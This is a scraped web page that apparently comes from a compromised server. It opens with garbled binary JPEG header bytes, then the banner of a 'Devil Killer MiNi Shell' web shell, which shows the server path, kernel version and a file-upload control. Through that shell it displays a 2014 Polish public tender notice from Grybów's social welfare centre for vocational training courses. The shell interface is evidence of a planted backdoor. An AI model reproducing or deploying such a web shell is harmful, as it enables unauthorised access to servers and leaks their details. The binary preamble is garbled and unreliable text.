JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140516/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140516/105547-N-2014.html

<p class="kh_header"><b>Grybów: Organizacja i przeprowadzenie kursów zawodowych Decoupage, Sprzedawca z obsługą kasy fiskalnej i programami magazynowo - fakturującymi, Opiekun medyczny, Przedstawiciel handlowy z prawem jazdy kat. B, Mała księgowość, Spawacz MAG dla 46 BO biorących udział  w realizowanych przez Gminny Ośrodek Pomocy Społecznej w Grybowie projekcie systemowym PO KL pn: Nowe perspektywy nowe szanse !, na podstawie umowy zawartej z Wojewódzkim Urzędem Pracy w Krakowie o dofinansowanie wyżej wskazanego projektu w ramach Poddziałania 7.1.1, współfinansowanego ze środków EFS</b><br>
<b>Numer ogłoszenia: 105547 - 2014; data zamieszczenia: 16.05.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gminny Ośrodek  Pomocy Społecznej w Grybowie , ul. Jakubowskiego 33, 33-330 Grybów, woj. małopolskie, tel. 18 448 42 46, faks 18 448 42 46.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja i przeprowadzenie kursów zawodowych Decoupage, Sprzedawca z obsługą kasy fiskalnej i programami magazynowo - fakturującymi, Opiekun medyczny, Przedstawiciel handlowy z prawem jazdy kat. B, Mała księgowość, Spawacz MAG dla 46 BO biorących udział  w realizowanych przez Gminny Ośrodek Pomocy Społecznej w Grybowie projekcie systemowym PO KL pn: Nowe perspektywy nowe szanse !, na podstawie umowy zawartej z Wojewódzkim Urzędem Pracy w Krakowie o dofinansowanie wyżej wskazanego projektu w ramach Poddziałania 7.1.1, współfinansowanego ze środków EFS.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest organizacja i  przeprowadzenie kursów zawodowych Decoupage, Sprzedawca z obsługą kasy fiskalnej i programami magazynowo - fakturującymi, Opiekun medyczny, Przedstawiciel handlowy z prawem jazdy kat. B, Mała księgowość, Spawacz MAG dla 46 Beneficjentów Ostatecznych biorących udział  w realizowanych przez Gminny Ośrodek Pomocy Społecznej w Grybowie projekcie systemowym PO KL pn: Nowe perspektywy nowe szanse !, zadanie 1 Aktywna integracja. Projekt realizowany jest przez Gminny Ośrodek Pomocy Społecznej w Grybowie w ramach Programu Operacyjnego Kapitał Ludzki, Działanie 7. 1 Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej.

2. Program szkolenia winien być przeprowadzony zgodnie z Rozporządzeniem Ministra Pracy i Polityki Społecznej z dnia 14 września 2010 r. w sprawie standardów i warunków prowadzenia usług na rynku pracy (Dz. U. Nr 177, poz. 1193 z późn. zm.).

3. Przedmiot zamówienia został opisany poniżej i obejmuje opracowanie zakresu tematycznego kursów Decoupage, Sprzedawca z obsługą kasy fiskalnej i programami magazynowo - fakturującymi, Opiekun medyczny, Przedstawiciel handlowy z prawem jazdy kat. B, Mała księgowość, Spawacz MAG dla osób uczestniczących w projekcie w następujący sposób:

a) Decoupage

Szkolenie ma na celu zapoznanie uczestników kursu z techniką ozdabiania przedmiotów metodą decoupage oraz metodami projektowania i tworzenia biżuterii. Szkolenie ma przyczynić się do uzyskania umiejętności potrzebnych do wykonywania przedmiotów zdobionych techniką decoupage-u. Uczestnicy winni poznać zarys historyczny decoupage, nauczyć się rozpoznawać i wykorzystywać materiały niezbędne do tworzenia decoupage-u, dowiedzieć się jakie akcesoria są niezbędne w tego typu pracy. Tematyka zajęć teoretycznych powinna obejmować podstawowe zagadnienia z kompozycji, psychologii widzenia i estetyki. Zajęcia praktyczne powinny obejmować techniki decoupage na szkle, metalu, drewnie oraz innych materiałach. Ponadto należy zapoznać uczestników z technikami wykańczania przedmiotów i uzyskiwania określonych efektów artystycznych (np. efekt spękań).
Dodatkowo każdy uczestnik ma zapoznać się z ozdabianiem biżuterii(tj. bransoletki, kolczyki, zawieszki, breloczki, broszki, itp.) oraz ozdabianiem przedmiotów gospodarstwa domowego (np. szkatułki, deski do krojenia, pudełka). Tworzenie ozdób okolicznościowych (np. pisanki, bombki).
Liczba godzin szkoleniowych grupowych (dla grupy 10 osób - minimum 40 godzin w ciągu 8 dni po maksymalnie 6 godzin dziennie).
Za godzinę zegarową kursu Decoupage przyjmuje się 45 minut zajęć edukacyjnych oraz 15 minut przerwy.


b) Sprzedawca z obsługą kasy fiskalnej i programami magazynowo - fakturującymi :

Obsługa kasy fiskalnej w połączeniu z komputerem - cześć teoretyczna i praktyczna:
a) Obsługa kas fiskalnych:
-   podstawowe akty prawne związane z zastosowaniem kas fiskalnych,
-   budowa, zasady działania oraz podział urządzeń fiskalnych,
-   przygotowanie kasy do pracy,
- sprzedaż, wykonywanie raportów, współpraca kas z urządzeniami dodatkowymi - czytnikiem kodów, komputerem,
-  praca kasjera (odpowiedzialność, raport kasowy, ochrona wartości pieniężnych, niedobory     i nadwyżki w kasie itp.),
-   kontakt z klientem.
b) Obsługa komputera:
-  podstawowe procedury Windows, praca z komputerem (uruchomienie, używanie myszki,   terminologia, okna programowe, używanie okien dialogowych i pasków narzędzi itp.),
-  główne metody pracy z pakietem Office (wprowadzanie tekstu, zaznaczanie i zastępowanie tekstu, zaznaczanie i formatowanie obiektów, ustawianie marginesów na stronie, wybór drukarki i drukowanie, zapamiętywanie pliku i ponowne otwieranie itp.),
- komunikowanie się droga elektroniczną, podstawowe umiejętności w obsłudze Internetu.
Obsługa programów magazynowo - fakturujących - cześć teoretyczna i praktyczna:
a) Obsługa Programu Subiekt:
-  tabela, lista kontrahentów, towarów i usług, wyszukiwarka Instynkt, typowe elementy okien, funkcje i skróty klawiszowe.
Główne moduły: kartoteka kontrahentów, towarów i usług, dokumenty handlowe, sprzedaż - faktury i rachunki, zakupy - faktury i rachunki, magazyn, finanse, zestawienia, administracja.
Podstawowe pojęcia: podmiot, magazyn, kontrahenci, personel, Urząd Skarbowy, rachunki bankowe, towary i usługi, dokumenty, kasy, stawki VAT, rabaty, formy płatności, należności i zobowiązania, odsetki, kategorie, grupy, wydruki, urządzenia fiskalne.
b) fakturowanie komputerowe:
-   faktury - zakres i zastosowanie: faktury VAT i faktura korygująca, faktury wewnętrzne, faktury: VAT RR, VAT UE, VAT MP, VAT marża, handlowe,
-   elementy obowiązkowe faktury,
-   zasady wystawiania faktur,
-   nierzetelność faktury,
-   faktura korygująca a nota korygująca - różnice i zastosowanie,
-   faktury przy zaliczce,
-   faktury wystawiane elektronicznie,
-   faktury wystawiane przez przedstawiciela podatkowego,
-   dowody mające wpływ na stawkę opodatkowania podatkiem VAT,
-   klasyfikacja statystyczna ważnym elementem faktury,
-   czy warto podpisywać faktury?,
-   praktyczne obowiązki wystawiających i osób księgujących faktury,
c)  zasady gospodarki magazynowej:
- organizacja prac magazynowych w przedsiębiorstwie (przyjęcie, składowanie, kompletowanie, wydawanie),
- manipulacje materiałami i pakowani: manipulacje materiałami, podział sprzętu do manipulacji materiałami ze względu na jego konstrukcję i kryteria jego wyboru, opakowanie   i jego wymogi projektowe, kody kreskowe, konteneryzacja, koncepcja systemu informacji logistycznej,
d) technologie prac magazynowych: charakterystyka technologicznego procesu magazynowania, proces magazynowy (czynności przyjęcia towarów do magazynu), zasady     i kryteria ustalenia miejsc składowania, procedury i dokumenty dostawy, proces     magazynowy (czynności kompletacji i wydania z magazynu a w nim: określenie ścieżki kompletacyjnej jedno i dwustopniowej, określenie zasad i miejsc grupowania asortymentów wg  zleceń wydania, przepakowania i zabezpieczania asortymentów do wysyłki, załadunku i wysyłki do odbiorców),
e) BHP na stanowisku pracy osoby fakturującej i magazyniera oraz podstawowe zasady higieny,
f) gospodarka zapasami: znaczenie zapasów, przyczyny utrzymywania zapasów, koszty            i klasyfikacja zapasów, podstawowe decyzje w zarządzaniu zapasami, metoda stałej wielkości zamówienia przy znanym i pewnym popycie oraz przy niepewnym (nieokreślonym) popycie, metoda stałego okresu zamówienia, tradycyjne metody zarządzania zapasami,
g) inwentaryzacja stanów magazynowych: pobranie aktualnych stanów magazynowych, wydruk spisu z natury dla komisji inwentaryzacyjnej, wprowadzenie ilości spisanych przez komisję do programu, aktualizacja stanów magazynowych, wydruk remanentu, rodzaje inwentaryzacji, inwentaryzacja ręczna, inwentaryzacja elektroniczna prowadzona przy pomocy inwentaryzatora,
h) cele, zadania i wyposażenie magazynu: wymagania dotyczące obiektu magazynowego wynikające z warunków przechowywania, urządzenia do składowania, środki transportu, pomocnicze urządzenia magazynowe, funkcje i rodzaje magazynów.
Liczba godzin szkoleniowych grupowych (dla grupy 10 osób - minimum 48 godzin w ciągu 8 dni po maksymalnie 6 godzin dziennie).
Za godzinę zegarową kursu Sprzedawcy z obsługą kasy fiskalnej i programami magazynowo - fakturującymi przyjmuje się 45 minut zajęć edukacyjnych oraz 15 minut przerwy.


c) Opiekun medyczny

Zakres tematyczny obejmuje aspekty teoretyczne jak i praktyczne:
a) zajęcia organizacyjne:
- zapoznanie się z wyposażeniem i sprzętem,
- zasady BHP,
- ochrona przed zakażeniem, dezynfekcja, sterylizacja,
b) rola i zadania opiekuna osób, formy opieki i pomocy ludziom starszym, i dzieciom, sylwetka zawodowa opiekuna,
c) anatomia z fizjologią,
d) procesy zachodzące w organizmie człowieka,
e) postawa wobec uczuć i sposobu zachowania pielęgnowanej osoby,
f) choroby, obserwacja chorego, pomiar parametrów,
g) problemy opieki chorych niepełnosprawnych,
h) zabiegi pielęgnacyjno-higieniczne u osoby dorosłej, pielęgnowanie dziecka, /udogodnienia, środki pielęgnacyjne, materac przeciwodleżynowy, rynienki do mycia głowy, bielizna osobista i pościelowa, sprzęt do przemieszczania chorych; podnośnik, wózek inwalidzki,
i) profilaktyka odleżyn oraz skutków długotrwałego unieruchomienia,
j) aspekty pielęgnacyjne rehabilitacji,
k) opieka nad umierającym i towarzyszenie śmierci,
l) pierwsza pomoc,
ł) farmakoterapia,
m) zasady żywienia ludzi chorych, starszych, dzieci i niepełnosprawnych,
n) wykonywania pomiarów: 
- ciśnienia tętniczego krwi z wykorzystaniem różnego rodzaju aparatów: sprężynowych, elektronicznych, nadgarstkowych,
- temperatury ciała z wykorzystaniem termometrów alkoholowych, elektronicznych, na podczerwień,
- poziomu cukru we krwi / glukometr/,
o) czynności w ramach pomocy przedmedycznej: 
- zakładania opatrunków na różne okolice ciała / bandaże, chusty trójkątne/
- zabiegów ożywiających / fantom dziecka i osoby dorosłej do prowadzenia zabiegów ożywiających/.
Liczba godzin szkoleniowych grupowych (dla grupy 4 osób - minimum 60 godzin w ciągu 10 dni po maksimum 6 godzin dziennie).
Za godzinę zegarową kursu Opiekun medyczny przyjmuje się 45 minut zajęć edukacyjnych oraz 15 minut przerwy.
Zamawiający  wymaga aby kurs Opiekun medyczny odbywał się w nieczynnym w czasie szkoleniowym przeprowadzania kursu zakładzie opieki medycznej.

d) Przedstawiciel handlowy z prawem jazdy kat. B

Moduł teoretyczny dla przedstawiciela handlowego:
- rola i zadania przedstawiciela handlowego ,zakres obowiązków,
- reklama i promocja, pozyskanie klientów, utrzymanie kontaktów handlowych,
- techniki i etapy sprzedaży ,sprzedaż w terenie,
- organizowanie dostaw towarów do klientów, negocjacje, techniki negocjacji,
- zagadnienia finansowo-prawne dotyczące sprzedaży i zawodu handlowca, zażalenia, reklamacje,
- reklama i promocje,
- marketing wystawienniczy,
- komunikacja międzyludzka,
Moduł teoretyczny dla kursu prawa jazdy kat. B:
- przepisy ruchu drogowego,
- technika jazdy,
Moduł praktyczny dla prawa jazdy kat. B:
Zakres z nauki jazdy odbywać się będą na podstawie indywidualnego planu kursanta
Wykonawca we własnym zakresie zapewni:
a) warunki lokalowe, plac manewrowy (120 m2  wyposażony w pachołki i tyczki )                         i wyposażenie dydaktyczne zgodne z Rozporządzeniem Ministra Infrastruktury z dnia 27 października 2005 r. w sprawie szkolenia, egzaminowania i uzyskiwania uprawnień przez kierujących pojazdami, instruktorów i egzaminatorów (Dz. U. z 2005 r. Nr 217 poz. 1834 ze zm.),
b) sprzęt komputerowy wraz z odpowiednim oprogramowaniem i dodatkowym wyposażeniem umożliwiającym sprawdzenie nabytej przez uczestników wiedzy teoretycznej. Ponadto, Wykonawca zapewni każdemu uczestnikowi kursu bezzwrotny egzemplarz podręcznika dla kandydatów na kurs prawo jazdy kat. B wraz z płytą DVD/CD zawierającą aktualnie obowiązujące zestawy pytań testowych wykorzystywane podczas egzaminu państwowego,
c) realizując praktyczną naukę jazdy, marki samochodów należy dostosować do wymagań Małopolskiego Ośrodka Ruchu Drogowego w Nowym Sączu lub Wojewódzkiego Ośrodka  Ruchu Drogowego w Krośnie.
d) zajęcia będące przedmiotem zamówienia muszą być przeprowadzone przez doświadczoną i wykwalifikowaną kadrę spełniającą wymogi nałożone przepisami Rozporządzenia Ministra Infrastruktury z dnia 27 października 2005 r. w sprawie szkolenia, egzaminowania i uzyskiwania uprawnień przez kierujących pojazdami, instruktorów 
i egzaminatorów (Dz. U. z 2005 r. Nr 217 poz. 1834 ze zm.),
e)  kurs prawa jazdy winien zakończyć się przeprowadzeniem egzaminu państwowego zgodnie z obowiązującymi w tym zakresie przepisami. W koszt kursu wchodzi opłata za pierwszy egzamin (kolejne pokrywa uczestnik we własnym zakresie).
Liczba godzin szkoleniowych grupowych (dla grupy 17 osób - minimum 90 godzin, w tym minimum 30 godzin zajęć teoretycznych dla przedstawiciela handlowego, minimum 30 godzin zajęć teoretycznych dla kursu prawa jazdy kat. B i 30 godzin zajęć praktycznych dla kursu prawa jazdy kat. B). 
Za godzinę zegarową na zajęciach teoretycznych przedstawiciela handlowego oraz prawa jazdy kat. przyjmuje się 45 minut zajęć edukacyjnych oraz 15 minut przerwy, natomiast na zajęciach praktycznych prawa jazdy kat. B przyjmuje się pełną godzinę zegarową.

e) Mała księgowość

Zakres tematyczny obejmuje aspekty teoretyczne jak i praktyczne:
a) Małe i średnie przedsiębiorstwa; 
- podstawy prawne i zasady prowadzenia rachunkowości w małych i średnich przedsiębiorstwach, 
- dokumentacja przyjętych zasad prowadzenia rachunkowości w małych i średnich przedsiębiorstwach, 
- podstawowe zasady otwierania, prowadzenia i zamykania ksiąg rachunkowych w małych      i średnich przedsiębiorstwach,
- dokumentacja zasad prowadzenia rachunkowości przy użyciu komputera, 
- zasady sporządzania, obiegu, kontroli i przechowywania dowodów księgowych w małych     i średnich przedsiębiorstwach,
 - charakterystyka i ewidencja księgowa aktywów trwałych,
 - charakterystyka i ewidencja księgowa aktywów obrotowych,
 - charakterystyka i ewidencja księgowa kosztów i przychodów,
 - podatkowa księga przychodów i rozchodów w przedsiębiorstwie,
 - kapitały w przedsiębiorstwie,
 - zamknięcie ksiąg rachunkowych w przedsiębiorstwie,
 -wybrane zagadnienia Kodeksu Cywilnego,
 - umowy cywilno prawne,
 - warunki zatrudnienia,
b) Prawo pracy, kadry:
- organizacja i funkcjonowanie komórki spraw osobowych firmy,
- akta osobowe, ewidencje, rodzaje i sposoby prowadzenia,
- prawo pracy,
- stosunek pracy - rodzaje umów,
- obowiązki pracowników i pracodawcy,
- czas pracy,
- urlopy wypoczynkowe i bezpłatne,
c) Płace i ZUS:
- prawne i ekonomiczne aspekty wynagradzania,
- systemy wynagrodzeń - czasowy, prowizyjny, akordowy,
- zasady naliczania niektórych składników,
- płatnik składek i zasady podlegania w systemie ubezpieczeń społecznych,
- składki na Fundusz Pracy i Fundusz gwarantowanych Świadczeń Pracowniczych,
- ustalanie stopy procentowej na ubezpieczenie wypadkowe,
- podatki,
d) obsługa programów: Płatnik oraz wybranego programu księgowego:
- wprowadzanie danych,
- zakładanie nowej firmy w programie,
- tworzenie, ewidencjonowanie czasu pracy: pracowników, zleceniobiorców,
- tworzenie umów gwarancyjnych, zlecenia, o dzieło, list płac, wydruków dokumentów,
- transmisja danych,
- wprowadzanie danych,
- tworzenie rejestru firmy,
- tworzenie wydruków,
- tworzenie dokumentów zgłoszeniowo - rozliczeniowych,
Liczba godzin szkoleniowych grupowych (dla grupy 2 osób - minimum 48 godzin w ciągu 8 dni po maksymalnie 6 godzin dziennie).
Za godzinę zegarową kursu Księgowość przyjmuje się 45 minut zajęć edukacyjnych oraz 15 minut przerwy.

f) Spawacz MAG 
Zakres tematyczny obejmuje aspekty teoretyczne jak i praktyczne:
- Zastosowanie elektryczności do spawania łukowego,
- Urządzenia spawalnicze,
- Bezpieczeństwo i higiena pracy,
- Bezpieczna praca na hali produkcyjnej,
- Materiały dodatkowe do spawania,
- Rysunek spawalniczy,
- Spawanie w praktyce,
- Oznaczenie i wymiarowanie spoin,
- Metody przygotowania złączy do spawania,
- Kwalifikowanie spawaczy,
- Budowa i użytkowanie urządzeń do spawania /MAG, 
- Materiały dodatkowe do spawania,
- Bezpieczeństwo i higiena pracy,
- Charakterystyka spawania MAG oraz typowe parametry,
- Instruktaż wstępny,
- Zajęcia praktyczne,

(dla grupy 3 osób - minimum 110 godzin w ciągu 24 dni po maksymalnie 6 godzin dziennie).
Za godzinę zegarową kursu Spawacz przyjmuje się 45 minut zajęć edukacyjnych oraz 15 minut przerwy.

Szkolenie winno być przeprowadzone zgodnie z wymogami określonymi w Rozporządzeniu Ministra gospodarki z dnia 27.04.2000r. w sprawie Bezpieczeństwa i Higieny Pracy przy pracach spawalniczych (Dz. U. Nr 40, poz. 470).
 Informacja dodatkowa:
W przypadku szkolenia: Spawanie podstawowe metodą MAG 135 w osłonie CO zaświadczenia i książeczki spawacza winny być wydane zgodnie z wytycznymi Instytutu Spawalnictwa oraz Rozporządzenia Ministra Gospodarki z dnia 27.04.200 roku w sprawie Bezpieczeństwa i Higieny Pracy przy pracach spawalniczych (Dz. U. Nr 40, poz. 470)..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 29.08.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>za spełnienie powyższego warunku zamawiający uzna posiadanie przez Wykonawcę aktualnego wpisu do Rejestru Instytucji Szkoleniowych prowadzonych przez Wojewódzki Urząd Pracy właściwy dla siedziby Wykonawcy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>za spełnienie tego warunku Zamawiający uzna wykonanie z należytą starannością w okresie trzech ostatnich lat (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie), przed dniem składania ofert:
a) co najmniej dwóch różnych usług, odpowiadających swoim rodzajem  usłudze Decoupage, i
b) co najmniej dwóch różnych usług, odpowiadających swoim rodzajem  usłudze Sprzedawca z obsługą kasy fiskalnej i programami magazynowo - fakturującymi, i
c) co najmniej dwóch różnych usług, odpowiadających swoim rodzajem  usłudze Opiekun medyczny i
d)  co najmniej dwóch różnych usług, odpowiadających swoim rodzajem  usłudze  Przedstawiciel handlowy z prawem jazdy kat. B , i
e) co najmniej dwóch różnych usług, odpowiadających swoim rodzajem  usłudze Mała księgowość, i 
f) co najmniej dwóch różnych usług, odpowiadających swoim rodzajem  usłudze Spawacz MAG</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>za spełnienie powyższego warunku, Zamawiający uzna wykazanie przez Wykonawcę osób (kadra zawodowa - według wzoru stanowiącego Załącznik Nr 6 do SIWZ) mających uczestniczyć w realizacji przedmiotu zamówienia, posiadających kwalifikacje zawodowe niezbędne do realizacji zamówienia tj.:

Na podstawie oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych (Załącznik Nr 3 do SIWZ) oraz wykazu kadry zawodowej proponowanej do wykonania usług (Załącznik Nr 6 do SIWZ) Zamawiający dokona oceny spełnienia wymaganego warunku wg formuły : spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a spełnienie powyższego warunku zamawiający uzna posiadanie przez Wykonawcę aktualnego wpisu do Rejestru Instytucji Szkoleniowych prowadzonych przez Wojewódzki Urząd Pracy właściwy dla siedziby Wykonawcy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych (Załącznik Nr 3 do SIWZ) Zamawiający dokona oceny spełnienia wymaganego warunku wg formuły : spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

